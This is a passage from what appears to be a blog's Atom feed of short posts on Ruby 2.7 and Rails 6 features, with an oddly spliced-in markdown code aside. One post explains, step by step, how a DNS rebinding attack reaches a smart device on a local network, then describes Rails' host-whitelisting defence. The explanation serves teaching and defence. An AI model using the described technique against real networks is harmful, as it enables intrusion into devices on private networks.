&gt; [10, 100, 1000].each_with_index { p _1, _2 }</code></pre><p>As mentioned in the <a href="https://github.com/ruby/ruby/blob/7f6bd6bb1c2220d2d7c17b77abf52fb4af548001/doc/NEWS-2.7.0#numbered-parameters">NEWS-2.7.0 docs</a>, Ruby now raises a warning if we try to define a local variable in the format <code>_1</code>. The local variable will take precedence over the numbered parameter inside the block.</p><pre><code class="language-ruby">&gt; _1 = 0
=&gt; warning: `_1' is reserved for numbered parameter; consider another name
&gt; [10].each { p _1 }
=&gt; 0</code></pre><p>Numbered parameters are not accessible inside the block if we define ordinary parameters.
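One more behavior worth knowing, shown in our own supplementary example below (not from the NEWS document): when a block receives array elements, numbered parameters destructure them the same way ordinary |a, b| parameters would.

```ruby
pairs = [[1, 2], [3, 4]]

# Referencing only _1 passes each element through whole.
p pairs.map { _1 }        # => [[1, 2], [3, 4]]

# Referencing _2 as well destructures each inner array,
# exactly like the block { |a, b| a + b } would.
p pairs.map { _1 + _2 }   # => [3, 7]
```

So the highest numbered parameter used in the block determines its effective arity.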
If we try to access <code>_1</code> when ordinary parameters are defined, then Ruby raises a <code>SyntaxError</code>, as shown below.</p><pre><code class="language-ruby">&gt; [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;].each_with_index { |alphabet, index| p _1, _2 }
=&gt; SyntaxError ((irb):1: ordinary parameter is defined)</code></pre><p>This feature was suggested 9 years ago and came back into discussion last year. After many suggestions, the community agreed to use the <code>_1</code> syntax.</p><p>Head to the following links to read the discussion behind numbered parameters: <a href="https://bugs.ruby-lang.org/issues/4475">Feature #4475</a> and <a href="https://bugs.ruby-lang.org/issues/15723">Discussion #15723</a>.</p><p>Here's the relevant <a href="https://github.com/ruby/ruby/commit/12acc751e3e7fd6f8aec33abf661724ad76c862a">commit</a> for this feature.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 fixes after_commit callback invocation bug]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-fixes-a-bug-where-after_commit-callbacks-are-called-on-failed-update-in-a-transaction-block"/>
      <updated>2020-02-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-fixes-a-bug-where-after_commit-callbacks-are-called-on-failed-update-in-a-transaction-block</id>
      <content type="html"><![CDATA[<p>Rails 6 fixes a <a href="https://github.com/rails/rails/issues/29747">bug</a> where <a href="https://apidock.com/rails/ActiveRecord/Transactions/ClassMethods/after_commit">after_commit</a> callbacks are called on a failed update in a transaction block.</p><p>Let's check out the bug in Rails 5.2 and the fix in Rails 6.</p><h4>Rails 5.2</h4><p>Let's define an <a href="https://apidock.com/rails/ActiveRecord/Transactions/ClassMethods/after_commit">after_commit</a> callback in the <code>User</code> model and try updating an invalid user object in a transaction block.</p><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :name, :email, presence: true
&gt;&gt;
&gt;&gt;   after_commit :show_success_message
&gt;&gt;
&gt;&gt;   private
&gt;&gt;
&gt;&gt;     def show_success_message
&gt;&gt;       p 'User has been successfully saved into the database.'
&gt;&gt;     end
&gt;&gt; end
=&gt; :show_success_message

&gt;&gt; user = User.create(name: 'Jon Snow', email: 'jon@bigbinary.com')
begin transaction
User Create (0.8ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;email&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?, ?)
[[&quot;name&quot;, &quot;Jon Snow&quot;], [&quot;email&quot;, &quot;jon@bigbinary.com&quot;], [&quot;created_at&quot;, &quot;2019-07-14 15:35:33.517694&quot;], [&quot;updated_at&quot;, &quot;2019-07-14 15:35:33.517694&quot;]]
commit transaction
&quot;User has been successfully saved into the database.&quot;
=&gt; #&lt;User id: 1, name: &quot;Jon Snow&quot;, email: &quot;jon@bigbinary.com&quot;, created_at: &quot;2019-07-14 15:35:33&quot;, updated_at: &quot;2019-07-14 15:35:33&quot;&gt;

&gt;&gt; User.transaction do
&gt;&gt;   user.email = nil
&gt;&gt;   p user.valid?
&gt;&gt;   user.save
&gt;&gt; end
begin transaction
false
commit transaction
&quot;User has been successfully saved into the database.&quot;
=&gt; false</code></pre><p>As we can see here, the after_commit callback <code>show_success_message</code> was called even though the object was never saved in the transaction.</p><h4>Rails 6.0.0.rc1</h4><p>Now, let's try the same thing in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :name, :email, presence: true
&gt;&gt;
&gt;&gt;   after_commit :show_success_message
&gt;&gt;
&gt;&gt;   private
&gt;&gt;
&gt;&gt;     def show_success_message
&gt;&gt;       p 'User has been successfully saved into the database.'
&gt;&gt;     end
&gt;&gt; end
=&gt; :show_success_message

&gt;&gt; user = User.create(name: 'Jon Snow', email: 'jon@bigbinary.com')
SELECT sqlite_version(*)
begin transaction
User Create (1.0ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;email&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?, ?)
[[&quot;name&quot;, &quot;Jon Snow&quot;], [&quot;email&quot;, &quot;jon@bigbinary.com&quot;], [&quot;created_at&quot;, &quot;2019-07-14 15:40:54.022045&quot;], [&quot;updated_at&quot;, &quot;2019-07-14 15:40:54.022045&quot;]]
commit transaction
&quot;User has been successfully saved into the database.&quot;
=&gt; #&lt;User id: 1, name: &quot;Jon Snow&quot;, email: &quot;jon@bigbinary.com&quot;, created_at: &quot;2019-07-14 15:40:54&quot;, updated_at: &quot;2019-07-14 15:40:54&quot;&gt;

&gt;&gt; User.transaction do
&gt;&gt;   user.email = nil
&gt;&gt;   p user.valid?
&gt;&gt;   user.save
&gt;&gt; end
false
=&gt; false</code></pre><p>Now we can see that the after_commit callback is never called if the object was not saved.</p><p>Here is the relevant <a href="https://github.com/rails/rails/issues/29747">issue</a> and the <a href="https://github.com/rails/rails/pull/32185">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Enumerable#tally]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-tally"/>
      <updated>2020-02-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-tally</id>
      <content type="html"><![CDATA[<p>Let's say that we have to find the frequency of each element of an array.</p><p>Before Ruby 2.7, we could have achieved it using <code>group_by</code> or <code>inject</code>.</p><pre><code class="language-ruby">irb&gt; scores = [100, 35, 70, 100, 70, 30, 35, 100, 45, 30]

# we can use group_by to group the scores
irb&gt; scores.group_by { |v| v }.map { |k, v| [k, v.size] }.to_h
=&gt; {100=&gt;3, 35=&gt;2, 70=&gt;2, 30=&gt;2, 45=&gt;1}

# or we can use inject to group the scores
irb&gt; scores.inject(Hash.new(0)) { |hash, score| hash[score] += 1; hash }
=&gt; {100=&gt;3, 35=&gt;2, 70=&gt;2, 30=&gt;2, 45=&gt;1}</code></pre><h4>Ruby 2.7</h4><p>Ruby 2.7 adds <code>Enumerable#tally</code>, which can be used to find the frequency. <code>tally</code> makes the code more readable and intuitive. It returns a hash where the keys are the unique elements and the values are their corresponding frequencies.</p><pre><code class="language-ruby">irb&gt; scores = [100, 35, 70, 100, 70, 30, 35, 100, 45, 30]
irb&gt; scores.tally
=&gt; {100=&gt;3, 35=&gt;2, 70=&gt;2, 30=&gt;2, 45=&gt;1}</code></pre><p>Check out the <a href="https://github.com/ruby/ruby/commit/673dc51c251588be3c9f4b5b5486cd80d46dfeee">GitHub commit</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 introduces class_names helper]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-introduces-class_names-helper"/>
      <updated>2020-02-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-introduces-class_names-helper</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds the <a href="https://github.com/rails/rails/pull/37918">class_names</a> view helper method to conditionally add CSS classes. The <code>class_names</code> helper accepts String, Hash and Array arguments and returns a string of class names built from those arguments.</p><p>Before Rails 6.1, conditional classes were added using conditional statements. Let's take the example of adding an active class to a navigation link based on the current page.</p><h4>Rails 6.0.0</h4><pre><code class="language-erb">&lt;li class=&quot;&lt;%= current_page?(dashboards_path) ? 'active' : '' %&gt;&quot;&gt;
  &lt;%= link_to &quot;Home&quot;, dashboards_path %&gt;
&lt;/li&gt;</code></pre><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt;&gt; class_names(active: current_page?(dashboards_path))
=&gt; &quot;active&quot;

# Default classes can be added along with conditional classes
&gt;&gt; class_names('navbar', { active: current_page?(dashboards_path) })
=&gt; &quot;navbar active&quot;

# The class_names helper rejects empty strings, nil and false arguments.
&gt;&gt; class_names(nil, '', false, 'navbar', { active: current_page?(dashboards_path) })
=&gt; &quot;navbar active&quot;</code></pre><pre><code class="language-erb">&lt;li class=&quot;&lt;%= class_names(active: current_page?(dashboards_path)) %&gt;&quot;&gt;
  &lt;%= link_to &quot;Home&quot;, dashboards_path %&gt;
&lt;/li&gt;</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/37918">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails Multiple Polymorphic Joins]]></title>
       <author><name>Priyank Gupta</name></author>
      <link href="https://www.bigbinary.com/blog/rails-multiple-polymorphic-joins"/>
      <updated>2020-01-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-multiple-polymorphic-joins</id>
      <content type="html"><![CDATA[<p>Having polymorphic associations in Rails can be a hard nut to crack. Rails enforces a restriction on joining polymorphic associations, which makes it difficult to write complex queries.</p><p>Consider the following architecture, where defects can belong to an <code>InspectedTruck</code> or an <code>InspectedTrailer</code> through a polymorphic association.</p><pre><code class="language-ruby">class InspectedTruck
  has_many :defects, as: :associated_object
end

class InspectedTrailer
  has_many :defects, as: :associated_object
end

class Defect
  belongs_to :associated_object, polymorphic: true
end</code></pre><p>Finding defects for inspected trucks using <code>joins</code> will raise an error.</p><pre><code class="language-ruby">=&gt; Defect.joins(:associated_object).load
ActiveRecord::EagerLoadPolymorphicError: Cannot eagerly load the polymorphic association :associated_object</code></pre><p>We need to write a raw SQL <code>INNER JOIN</code> to fetch trucks with defects. The following query runs perfectly fine.</p><pre><code class="language-ruby">sql = &quot;INNER JOIN inspected_trucks ON inspected_trucks.id = defects.associated_object_id&quot;
Defect.joins(sql).load</code></pre><p>We faced a scenario in one of our applications with multiple polymorphic joins. We needed to build a single query which lists the vehicle inspection time, the truck or trailer number and the defect name (if available on the inspected item).</p><pre><code class="language-ruby">class Truck
  # attributes :number
  has_many :inspected_trucks
end

class Trailer
  # attributes :number
  has_many :inspected_trailers
end

class VehicleInspectionReport
  # attributes :inspection_time
  has_one :inspected_truck, class_name: &quot;InspectedTruck&quot;
  has_many :inspected_trailers, class_name: &quot;InspectedTrailer&quot;
end

class InspectedTruck
  belongs_to :truck
  has_many :defects, as: :associated_object
end

class InspectedTrailer
  belongs_to :trailer
  has_many
    :defects, as: :associated_object
end

class Defect
  # attributes :name
  belongs_to :associated_object, polymorphic: true
end</code></pre><p>The task here was to query <code>VehicleInspectionReport</code> joining five other tables and selecting the required attributes to show. But the challenge was posed by the polymorphic association.</p><p>We had to come up with a way to query <code>InspectedTruck</code> and <code>InspectedTrailer</code> as a single dataset. We identified that the dataset resembles a Single Table Inheritance (STI) dataset, and came up with the following subquery.</p><pre><code class="language-ruby">SELECT id AS associated_object_id, 'InspectedTruck' AS associated_object_type, vehicle_inspection_report_id, truck_id, NULL trailer_id
  FROM inspected_trucks
UNION
SELECT id AS associated_object_id, 'InspectedTrailer' AS associated_object_type, vehicle_inspection_report_id, NULL truck_id, trailer_id
  FROM inspected_trailers</code></pre><p>This subquery gave us all the inspected items in a single dataset, and we could refer to this dataset as a form of STI.</p><p>We were then able to build the final query using the above subquery.</p><p>Add a scope in <code>VehicleInspectionReport</code> to join the inspected items.</p><pre><code class="language-ruby">class VehicleInspectionReport
  # attributes :inspection_time
  INSPECTED_ITEMS_RAW_SQL = &quot;(
    SELECT id, 'InspectedTruck' AS object_type, vehicle_inspection_report_id, truck_id, NULL trailer_id
      FROM inspected_trucks
    UNION
    SELECT id, 'InspectedTrailer' AS object_type, vehicle_inspection_report_id, NULL truck_id, trailer_id
      FROM inspected_trailers
  ) AS inspected_items&quot;

  has_one :inspected_truck, class_name: &quot;InspectedTruck&quot;
  has_many :inspected_trailers, class_name: &quot;InspectedTrailer&quot;

  scope
    :joins_with_inspected_items,
    -&gt; { joins(&quot;INNER JOIN #{INSPECTED_ITEMS_RAW_SQL} ON vehicle_inspection_reports.id = inspected_items.vehicle_inspection_report_id&quot;) }
end</code></pre><p>The <code>joins_with_inspected_items</code> scope on <code>VehicleInspectionReport</code> works by joining an STI-style table (<code>inspected_items</code>) onto <code>VehicleInspectionReport</code>. We can now chain any query which requires inspected items. Example:</p><pre><code class="language-ruby">VehicleInspectionReport.select(&quot;defects.id AS defect_id,
                                defects.name AS description,
                                trucks.truck_number AS truck_number,
                                trailers.number AS trailer_number,
                                vehicle_inspection_reports.inspection_time AS inspection_time&quot;)
  .joins_with_inspected_items
  .joins(&quot;LEFT JOIN defects ON inspected_items.id = defects.associated_object_id
            AND defects.associated_object_type = inspected_items.object_type&quot;)
  .joins(&quot;LEFT JOIN trucks ON inspected_items.truck_id = trucks.id&quot;)
  .joins(&quot;LEFT JOIN trailers ON inspected_items.trailer_id = trailers.id&quot;)
  .where(&quot;inspected_items.id IS NOT NULL&quot;)
  .order('truck_number, trailer_number, inspection_time DESC')</code></pre><p>The underlying concept here is to structure an STI dataset from a polymorphic architecture. Notice how the <code>inspected_items</code> dataset is used in the form of STI, via <code>inspected_items.id</code> and <code>inspected_items.object_type</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds rails db:prepare to migrate or setup a database]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-rails-db-prepare-to-migrate-or-setup-a-database"/>
      <updated>2019-12-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-rails-db-prepare-to-migrate-or-setup-a-database</id>
      <content type="html"><![CDATA[<p>Rails 6 adds rails db:prepare to migrate or set up a database if it doesn't exist.</p><p>Before Rails 6, we had to run the following tasks to set up the database.</p><pre><code class="language-ruby"># create the database
rails db:create

# run the migrations
rails db:migrate

# prepopulate the database with initial/default data
rails db:seed</code></pre><h4>Rails 6</h4><p>Rails 6 adds <a href="https://github.com/rails/rails/blob/98754de1412870d7dae9eba1c7bac944b9b90093/activerecord/lib/active_record/railties/databases.rake#L298">rails db:prepare</a> to get rid of running all the above tasks individually. <code>rails db:prepare</code> first calls <a href="https://github.com/rails/rails/blob/98754de1412870d7dae9eba1c7bac944b9b90093/activerecord/lib/active_record/railties/databases.rake#L306"><code>migrate</code></a> to run the migrations, but if the database doesn't exist, <code>migrate</code> throws an <code>ActiveRecord::NoDatabaseError</code>. Once the error is <a href="https://github.com/rails/rails/blob/98754de1412870d7dae9eba1c7bac944b9b90093/activerecord/lib/active_record/railties/databases.rake#L311">caught</a>, it performs the following operations:</p><ul><li>Creates the database.</li><li>Loads the schema.</li><li>Seeds the database.</li></ul><p>Thus, <code>rails db:prepare</code> saves a lot of time spent on running database tasks individually while setting up an application, and finishes it with just one command.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35768">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds *_previously_was attribute methods]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-_previously_was-attribute-methods"/>
      <updated>2019-12-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-_previously_was-attribute-methods</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <a href="https://github.com/rails/rails/pull/36836">*_previously_was</a> attribute methods for dirty tracking the previous attribute value after the model is saved or reset. <code>*_previously_was</code> returns the previous attribute value that was changed before the model was saved.</p><p>Before Rails 6.1, to retrieve the previous attribute value, we used <code>*_previous_change</code> or <a href="https://apidock.com/rails/ActiveModel/Dirty/previous_changes">previous_changes</a>.</p><p>Here is how it can be used.</p><h4>Rails 6.0.0</h4><pre><code class="language-ruby">&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, name: nil, email: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; user.name = &quot;Sam&quot;

# *_was returns the original value. In this example, the name was initially nil.
&gt;&gt; user.name_was
=&gt; nil
&gt;&gt; user.save!

# After save, the original value is set to &quot;Sam&quot;. To retrieve the
# previous value, we had to use `previous_changes`.
&gt;&gt; user.previous_changes[:name]
=&gt; [nil, &quot;Sam&quot;]</code></pre><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt;&gt; user = User.find_by(name: &quot;Sam&quot;)
=&gt; #&lt;User id: 1, name: &quot;Sam&quot;, email: nil, created_at: &quot;2019-10-14 17:53:06&quot;, updated_at: &quot;2019-10-14 17:53:06&quot;&gt;
&gt;&gt; user.name = &quot;Nick&quot;
&gt;&gt; user.name_was
=&gt; &quot;Sam&quot;
&gt;&gt; user.save!
&gt;&gt; user.previous_changes[:name]
=&gt; [&quot;Sam&quot;, &quot;Nick&quot;]

# *_previously_was returns the previous value.
&gt;&gt; user.name_previously_was
=&gt; &quot;Sam&quot;

# After reload, all the dirty tracking attributes are reset.
&gt;&gt; user.reload
&gt;&gt; user.name_previously_was
=&gt; nil</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/36836">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds guard against DNS Rebinding attacks]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-guard-against-dns-rebinding-attacks"/>
      <updated>2019-11-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-guard-against-dns-rebinding-attacks</id>
      <content type="html"><![CDATA[<p>In a DNS Rebinding attack, a malicious webpage runs a client-side script when it is loaded, to attack endpoints within a given network.</p><h3>What is a DNS Rebinding attack?</h3><p>DNS Rebinding can be summarized as follows.</p><ul><li>An unsuspecting victim is tricked into loading <code>rebinding.network</code>, which is resolved by a DNS server controlled by a malicious entity.</li><li>The victim's web browser sends a DNS query and gets the real IP address, say <code>24.56.78.99</code>, of <code>http://rebinding.network</code>. This DNS server also sets a very short TTL value (say 1 second) on the response so that the client won't cache this response for long.</li><li>The script on this webpage cannot attack services running in the local network due to CORS restrictions imposed by the victim's web browser. Instead, it starts sending a suspicious POST request to <code>http://rebinding.network/setup/reboot</code> with a JSON payload <code>{params: factory-reset}</code>.</li><li>The first few requests are indeed sent to <code>24.56.78.99</code> (the real IP address), with the DNS info from the cache, but then the browser sends out a DNS query for <code>rebinding.network</code> when it observes that the cache has gone stale.</li><li>When the malicious DNS server gets the request for a second time, instead of responding with <code>24.56.78.99</code> (which is the real IP address of <code>rebinding.network</code>), it responds with <code>192.168.1.90</code>, an address at which a poorly secured smart device runs.</li></ul><p>Using this exploit, an attacker is able to factory-reset a device which relied on the security provided by the local network.</p><p>This attack is explained in much more detail <a href="https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325">in this blog post</a>.</p><h3>How does it affect Rails?</h3><p>Rails' web console was particularly vulnerable to a Remote Code Execution (RCE) via DNS
Rebinding.</p><p><a href="http://benmmurphy.github.io/blog/2016/07/11/rails-webconsole-dns-rebinding/">In this blog post</a>, Ben Murphy goes into the technical details of exploiting this vulnerability to open the Calculator app (only works on OS X).</p><h3>How does Rails 6 mitigate DNS Rebinding?</h3><p>Rails mitigates DNS Rebinding attacks by maintaining a whitelist of domains from which it can receive requests. This is achieved with a new <a href="https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/host_authorization.rb">HostAuthorization</a> middleware. This middleware leverages the fact that the HOST request header is <a href="https://developer.mozilla.org/en-US/docs/Glossary/Forbidden_header_name">a forbidden header</a>.</p><pre><code class="language-ruby"># taken from Rails documentation
# Allow requests from subdomains like `www.product.com` and
# `beta1.product.com`.
Rails.application.config.hosts &lt;&lt; /.*\.product\.com/</code></pre><p>In the above example, Rails would render the <a href="https://github.com/rails/rails/blob/ee0d0b1220adda0ee48f67cc4340ff4d702f6ed9/actionpack/lib/action_dispatch/middleware/templates/rescues/blocked_host.html.erb">blocked host template</a> if it receives requests from domains outside of the above whitelist.</p><p>In the development environment, the default whitelist includes <code>0.0.0.0/0, ::0</code> (<a href="https://en.wikipedia.org/wiki/Default_route">CIDR notations for IPv4 and IPv6 default routes</a>) and <code>localhost</code>. For all other environments, <code>config.hosts</code> is empty and host header checks are not done.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveStorage::Blob#open]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activestorage-blob-open"/>
      <updated>2019-10-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activestorage-blob-open</id>
      <content type="html"><![CDATA[<p>Rails 6 adds <a href="https://edgeapi.rubyonrails.org/classes/ActiveStorage/Blob.html#method-i-open">ActiveStorage::Blob#open</a>, which downloads a blob to a tempfile on disk and yields the tempfile.</p><pre><code class="language-ruby">&gt;&gt; blob = ActiveStorage::Blob.first
=&gt; &lt;ActiveStorage::Blob id: 1, key: &quot;6qXeoibkvohP4VJiU4ytaEkH&quot;, filename: &quot;Screenshot 2019-08-26 at 10.24.40 AM.png&quot;, ..., created_at: &quot;2019-08-26 09:57:30&quot;&gt;
&gt;&gt; blob.open do |tempfile|
&gt;&gt;   puts tempfile.path  # do some processing
&gt;&gt; end
# Output: /var/folders/67/3n96myxs1rn5q_c47z7dthj80000gn/T/ActiveStorage-1-20190826-73742-mve41j.png</code></pre><h3>Processing a blob</h3><p>Let's take the example of a face detection application to which user images are uploaded. Let's assume that the images are uploaded to S3.</p><p>Before Rails 6, we would have to download the image into the system's memory, process it with an image processing program, and then send the processed image back to the S3 bucket.</p><h4>The overhead</h4><p>If the processing operation is successful, the original file can be deleted from the system. We need to take care of a lot of uncertain events from the download phase until the processed image is created.</p><h4>ActiveStorage::Blob#open to the rescue</h4><p>ActiveStorage::Blob#open abstracts away all these complications and gives us a tempfile which is closed and unlinked once the block is executed.</p><p>1. <code>open</code> takes care of handling all the fanfare of getting a blob object to a tempfile. 2. <code>open</code> takes care of the tempfile cleanup after the block.</p><pre><code class="language-ruby">&gt;&gt; blob = ActiveStorage::Blob.first
&gt;&gt; blob.open do |tempfile|
&gt;&gt;   tempfile # do some processing
&gt;&gt; end
# once the given block is executed
# the tempfile is closed and unlinked
=&gt; #&lt;Tempfile: (closed)&gt;</code></pre><p>By default, tempfiles are created in the <code>Dir.tmpdir</code> directory, but ActiveStorage::Blob#open also takes an optional argument <code>tmpdir</code> to set a custom directory for storing the tempfiles.</p><pre><code class="language-ruby">&gt;&gt; Dir.tmpdir
=&gt; &quot;/var/folders/67/3n96myxs1rn5q_c47z7dthj80000gn/T&quot;
&gt;&gt; blob = ActiveStorage::Blob.first
&gt;&gt; blob.open(tmpdir: &quot;/desired/path/to/save&quot;) do |tempfile|
&gt;&gt;   puts tempfile.path # do some processing
&gt;&gt; end</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/commit/9f95767979579f5761cb0d2bcccb67f3662349c5">commit</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActionMailer#email_address_with_name]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-actionmailer-email_address_with_name"/>
      <updated>2019-10-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-actionmailer-email_address_with_name</id>
      <content type="html"><![CDATA[<p>When using <code>ActionMailer::Base#mail</code>, if we want to display the name and email address of the user in the email, we can pass a string in the format <code>&quot;John Smith&quot; &lt;john@example.com&gt;</code> in the <code>to</code>, <code>from</code> or <code>reply_to</code> options.</p><p>Before Rails 6, we had to join the name and email address using string interpolation, as mentioned in the <a href="https://guides.rubyonrails.org/v5.2/action_mailer_basics.html#sending-email-with-name">Rails 5.2 Guides</a> and shown below.</p><pre><code class="language-ruby">email_with_name = %(&quot;John Smith&quot; &lt;john@example.com&gt;)
mail(
  to: email_with_name,
  subject: 'Hey Rails 5.2!'
)</code></pre><p>The problem with string interpolation is that it doesn't escape unexpected special characters like quotes (&quot;) in the name.</p><p>Here's an example.</p><h3>Rails 5.2</h3><pre><code class="language-ruby">irb(main):001:0&gt; %(&quot;John P Smith&quot; &lt;john@example.com&gt;)
=&gt; &quot;\&quot;John P Smith\&quot; &lt;john@example.com&gt;&quot;
irb(main):002:0&gt; %('John &quot;P&quot; Smith' &lt;john@example.com&gt;)
=&gt; &quot;'John \&quot;P\&quot; Smith' &lt;john@example.com&gt;&quot;</code></pre><p>Rails 6 adds <a href="https://github.com/rails/rails/pull/36454"><code>ActionMailer::Base#email_address_with_name</code></a> to join the name and email address in the format <code>&quot;John Smith&quot; &lt;john@example.com&gt;</code> and take care of escaping special characters.</p><h3>Rails 6.1.0.alpha</h3><pre><code class="language-ruby">irb(main):001:0&gt; ActionMailer::Base.email_address_with_name(&quot;john@example.com&quot;, &quot;John P Smith&quot;)
=&gt; &quot;John P Smith &lt;john@example.com&gt;&quot;
irb(main):002:0&gt; ActionMailer::Base.email_address_with_name(&quot;john@example.com&quot;, 'John &quot;P&quot; Smith')
=&gt; &quot;\&quot;John \\\&quot;P\\\&quot; Smith\&quot; &lt;john@example.com&gt;&quot;</code></pre><pre><code class="language-ruby">mail(
  to: email_address_with_name(&quot;john@example.com&quot;, &quot;John Smith&quot;),
  subject: 'Hey Rails 6!'
)</code></pre><p>Here's the relevant <a href="https://github.com/rails/rails/pull/36454">pull request</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 raises ArgumentError if param contains colon]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-raises-argumenterror-if-custom-param-contains-a-colon"/>
      <updated>2019-10-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-raises-argumenterror-if-custom-param-contains-a-colon</id>
      <content type="html"><![CDATA[<p>The <a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">:param</a> option in routes is used to override the default resource identifier, i.e. <code>:id</code>.</p><p>Let's say we want the product's <code>:name</code> to be the default resource identifier instead of <code>:id</code> while defining routes for <code>products</code>. In this case, the <a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">:param</a> option comes in handy. We will see below how we can use this option.</p><p>Before Rails 6, if a <a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">resource custom param</a> contained a colon, Rails treated the part after the colon as another route segment, which should not be the case because it sneaks in an extra param.</p><p>An <a href="https://github.com/rails/rails/issues/30467">issue</a> was raised in August 2017, which was later fixed in February 2019.</p><p>So, Rails 6 now raises an <code>ArgumentError</code> if a <a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">resource custom param</a> contains a colon (:).</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's create routes for <code>products</code> with the custom param <code>name/:pzn</code>.</p><pre><code class="language-ruby">&gt;&gt; Rails.application.routes.draw do
&gt;&gt;   resources :products, param: 'name/:pzn'
&gt;&gt; end</code></pre><pre><code class="language-plaintext">$ rake routes | grep products
    products GET    /products(.:format)                 products#index
             POST   /products(.:format)                 products#create
 new_product GET    /products/new(.:format)             products#new
edit_product GET    /products/:name/:pzn/edit(.:format) products#edit
     product GET    /products/:name/:pzn(.:format)      products#show
             PATCH  /products/:name/:pzn(.:format)      products#update
             PUT    /products/:name/:pzn(.:format)      products#update
             DELETE /products/:name/:pzn(.:format)      products#destroy</code></pre><p>As we can see, Rails also considers <code>:pzn</code> as a parameter.</p><p>Now let's see how it works in Rails 6.</p><h4>Rails 6.0.0.rc1</h4><pre><code class="language-ruby">&gt;&gt; Rails.application.routes.draw do
&gt;&gt;   resources :products, param: 'name/:pzn'
&gt;&gt; end</code></pre><pre><code class="language-plaintext">$ rake routes | grep products
rake aborted!
ArgumentError: :param option can't contain colons
/Users/amit/.rvm/gems/ruby-2.6.3/gems/actionpack-6.0.0.rc1/lib/action_dispatch/routing/mapper.rb:1149:in `initialize'
/Users/amit/.rvm/gems/ruby-2.6.3/gems/actionpack-6.0.0.rc1/lib/action_dispatch/routing/mapper.rb:1472:in `new'
/Users/amit/.rvm/gems/ruby-2.6.3/gems/actionpack-6.0.0.rc1/lib/action_dispatch/routing/mapper.rb:1472:in `block in resources'
.........</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/issues/30467">issue</a> and the <a href="https://github.com/rails/rails/pull/35236">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 introduces new code loader called Zeitwerk]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-introduces-new-code-loader-called-zeitwerk"/>
      <updated>2019-10-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-introduces-new-code-loader-called-zeitwerk</id>
